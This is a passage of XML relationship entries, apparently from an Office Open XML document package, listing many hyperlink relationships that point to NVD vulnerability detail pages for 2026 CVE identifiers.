Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86722" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58113" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67379" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74860" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75993" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76958" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85384" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69479" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69638" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75999" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77827" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86819" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19203" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69646" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81821" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81822" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69846" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69906" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72958" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72961" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72962" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76191" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76202" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77097" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77968" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81354" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81356" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81357" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81378" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81379" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83939" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86600" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47297" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55007" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69325" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69380" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69438" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69510" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69524" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69530" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69546" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69620" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69680" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69732" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69782" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69786" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69813" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69827" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69858" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69989" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70342" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70563" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72936" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72981" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72987" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73313" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75021" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77505" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78444" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78449" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78450" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78626" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82066" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83527" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83997" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84393" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86720" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86723" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28662" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55277" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68827" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68834" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68838" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68876" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68878" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68880" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68894" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69271" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69301" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69322" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69332" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69346" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69365" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69371" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69412" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69418" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69423" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69427" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69458" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69462" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69481" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69503" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69505" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69512" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69619" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69623" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69625" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69643" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69681" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69689" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69714" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69717" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69727" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69762" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69773" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69777" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69807" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69826" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69847" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69875" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69876" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83948" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0065" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0084" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28572" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28583" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28590" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28593" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28594" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28599" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28600" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28602" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28603" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28607" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28611" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28612" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28614" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28616" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28620" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28624" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28631" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28634" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28636" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28639" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28642" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28644" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28650" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28653" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28655" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28657" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28658" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28659" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28663" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28664" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28668" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45515" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45520" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45531" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49881" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49884" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49887" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49918" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49919" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49927" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49932" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55273" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55285" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55294" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56172" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56177" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56198" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5729" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58599" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58600" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58611" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58820" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 